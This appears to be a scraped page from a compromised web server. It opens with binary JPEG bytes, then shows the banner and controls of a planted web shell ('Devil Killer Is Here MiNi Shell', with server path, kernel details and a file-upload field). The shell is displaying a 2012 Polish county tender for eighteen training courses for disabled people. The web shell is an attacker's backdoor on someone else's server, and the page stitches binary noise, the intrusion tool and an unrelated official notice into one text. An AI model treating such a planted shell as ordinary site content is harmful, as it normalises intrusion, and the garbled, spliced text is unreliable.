JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/254408-N-2012.html

<p class="kh_header"><b>Świdwin: Szkolenia i kursy w ramach projektu Samodzielność zobowiązuje w roku
2012 - 18 zadań</b><br>
<b>Numer ogłoszenia: 254408 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia i kursy w ramach projektu Samodzielność zobowiązuje w roku
2012 - 18 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1. Kurs: Prawo jazdy kat. B
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
12
Liczba godzin 60 godz. (w tym zajęcia teoretyczne i praktyczne)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Instruktor posiadający odpowiednie uprawnienia
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu oraz płytę CD z nauką prawa jazdy
2. praktyczną naukę jazdy na bazie samochodu osobowego
przeznaczonego do nauki jazdy (marka i parametry zgodne
z samochodami egzaminacyjnymi ZORD),
3. salę szkoleniową/pracownię wyposażoną w niezbędny sprzęt
i urządzenia do przeprowadzenia zajęć
4. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
5. ubezpieczenie uczestnika,
6. szkolenie BHP uczestników,
7. pierwszy egzamin praktyczny (ZORD)
8. listy obecności z realizacji kursu,
9. sprawozdanie z realizacji kursu.
Badania lekarskie Nie dotyczy (uczestnicy posiadają zaświadczenie lekarskie)
Zadanie nr 2. Kurs: Prawo jazdy kat. T
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
1
Liczba godzin 60 godzin(w tym 30 godzin zajęć teoretycznych i 30 godzin zajęć
praktycznych)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Instruktor posiadający odpowiednie uprawnienia
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu oraz płytę CD z nauką prawa jazdy
2. praktyczną naukę jazdy na bazie samochodu osobowego
przeznaczonego do nauki jazdy (marka i parametry zgodne
z samochodami egzaminacyjnymi ZORD),
3. salę szkoleniową pracownię wyposażoną w niezbędny sprzęt
i urządzenia do przeprowadzenia zajęć,
4. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt notatnik do zajęć teoretycznych),
5. ubezpieczenie uczestnika,
6. szkolenie BHP uczestników,
7. pierwszy egzamin praktyczny (ZORD),
8. listy obecności z realizacji kursu,
9. sprawozdanie z realizacji kursu.
Badania lekarskie Nie dotyczy (uczestnicy posiadają zaświadczenie lekarskie)
Zadanie nr 3. Kurs: Prawo jazdy kat. C
Miejsce realizacji
kursu
( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
1
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 60 godzin(w tym 30 godzin zajęć teoretycznych i 30 godzin zajęć
praktycznych)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Instruktor posiadający odpowiednie uprawnienia
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu oraz płytę CD z nauką prawa jazdy
2. praktyczną naukę jazdy na bazie samochodu osobowego
przeznaczonego do nauki jazdy (marka i parametry zgodne
z samochodami egzaminacyjnymi ZORD),
3. salę szkoleniową/pracownię wyposażoną w niezbędny sprzęt
i urządzenia do przeprowadzenia zajęć,
4. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych),
5. ubezpieczenie uczestnika,
6. szkolenie BHP uczestników,
7. pierwszy egzamin praktyczny (ZORD),
8. listy obecności z realizacji kursu,
9. sprawozdanie z realizacji kursu
Kursant otrzymuje
dokumenty
Zaświadczenie / świadectwo ukończenia kursu
Badania lekarskie Nie dotyczy
Zadanie nr 4. Kurs: Operator koparko-ładowarki
Miejsce realizacji
kursu
W uzgodnieniu z zamawiającym(możliwość organizacji kursu
w Połczynie, Świdwinie lub Koszalinie)
Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin Zajęcia teoretyczne 116 godzin ( w tym egzamin wewnętrzny);
Zajęcia praktyczne 86 zajęć ( w tym egzamin wewnętrzny)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia i 2- letnie
doświadczenie w prowadzeniu kursów obsługi koparko-ładowarki,
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana),
7. Wykonawca zobowiązany jest do posiadania pozytywnego
wyniku kontroli Instytutu Mechanizacji Budownictwa i
Górnictwa Skalnego w Warszawie. w zakresie,
przygotowania pod względem metodycznym, dydaktycznym
i organizacyjnym do prowadzenia kursu,
Badania lekarskie Nie dotyczy(Beneficjenci odbyli badania lekarskie)
Zadanie nr 5 Kurs: Rękodzieło
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
5
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 40 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji od 1 sierpnia 2012 r. do 31 października 2012r.
Prowadzący Prowadzący Wykładowca mający doświadczenie
w prowadzeniu kursu rękodzieła
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Zadanie nr 6 Kurs: Podstawy Obsługi Komputera
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
6
Beneficjentami projektu są osoby niepełnosprawne (brak osób na
wózkach inwalidzkich)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 50 godz. (zajęcia teoretyczne i praktyczne)
Termin realizacji od 1 sierpnia 2012 r. do 31 października 2012r.
Prowadzący Wykładowca posiadający uprawnienia i doświadczenie w
prowadzeniu kursów komputerowych
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 7 Kurs komputerowy z obsługą kas fiskalnych, minimum sanitarnym
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
4
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózkach inwalidzkich)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 50 godz. (zajęcia teoretyczne i praktyczne)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Wykładowca posiadający uprawnienia i doświadczenie w
prowadzeniu kursów komputerowych
Obowiązki
organizatora
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 8. Kurs: Usprawnienia SEP do 1 KV
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
3
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 40 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący Wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursów Uprawnienia SEP
Obowiązki
organizatora
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 9. Kurs: Bukieciarstwo/florystyka
Miejsce realizacji Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 100 godz. (zajęcia teoretyczne i praktyczne)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący Wykładowca mający uprawnienia i doświadczenie
w prowadzeniu kursów bukieciarstwa i florystyki
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 10. Kurs: Pomoc Kuchenna/Kucharz
Miejsce realizacji
kursu
Świdwin
Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 80 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący Wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursów pomocy kucharza i pomocy
kuchennej
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 11. Kurs: Catering
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników
do przeszkolenia
6
Liczba godzin 100 godz. (zajęcia teoretyczne i praktyczne)
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący Wykładowca mający uprawnienia i doświadczenie w
prowadzeniu kursów cateringu
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr . 12. Kurs: Wózki widłowe z wymianą butli
Miejsce realizacji
kursu
Powiat Świdwiński ( w uzgodnieniu z zamawiającym)
Liczba uczestników 1
do przeszkolenia
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 60 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący Wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursów obsługi wózka widłowego
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 13. Kurs: Glazurnik
Miejsce realizacji
kursu
W uzgodnieniu z zamawiającym(możliwość organizacji kursu w
Połczynie, Świdwinie lub Koszalinie)
Liczba uczestników
do przeszkolenia
4
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 220 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursów związanych z nauką
glazurnictwa.
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 14. Kurs: Opiekun osób starszych z elementami języka niemieckiego
Miejsce realizacji
kursu
Powiat Świdwiński -w uzgodnieniu z zamawiającym
Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 120 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursów związanych z opieką nad
osobami starszymi, wykształcenie wyższe (dyplom magistra lub
inny równoważny) co najmniej dwuletnie doświadczenie zawodowe
w nauczaniu języka niemieckiego
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 15. Kurs: Makijaż i stylizacja paznokci
Miejsce realizacji
kursu
Powiat Świdwiński -w uzgodnieniu z zamawiającym
Liczba uczestników
do przeszkolenia
4
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 60 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursów związanych z wizerunkiem,
makijażem i stylizacją paznokci
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 16. Kurs językowy: Angielski średniozaawansowany
Miejsce realizacji
kursu
Powiat Świdwiński -w uzgodnieniu z zamawiającym
Liczba uczestników
do przeszkolenia
1
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 120 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 30 listopada 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia
i doświadczenie, wykształcenie wyższe (dyplom magistra lub inny
równoważny) co najmniej dwuletnie doświadczenie zawodowe w
nauczaniu języka angielskiego
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 17. Kurs: Masaż klasyczny I stopnia
Miejsce realizacji
kursu
Powiat Świdwiński -w uzgodnieniu z zamawiającym
Liczba uczestników
do przeszkolenia
3
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 80 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursu masażu klasycznego
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy
Zadanie nr 18. Kurs: Księgowość i Płatnik
Zakres merytoryczny
kursu
Zgodnie z programem i obowiązującymi przepisami
Miejsce realizacji
kursu
Powiat Świdwiński -w uzgodnieniu z zamawiającym
Liczba uczestników
do przeszkolenia
1
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 80 godz. (zajęcia teoretyczne i praktyczne)
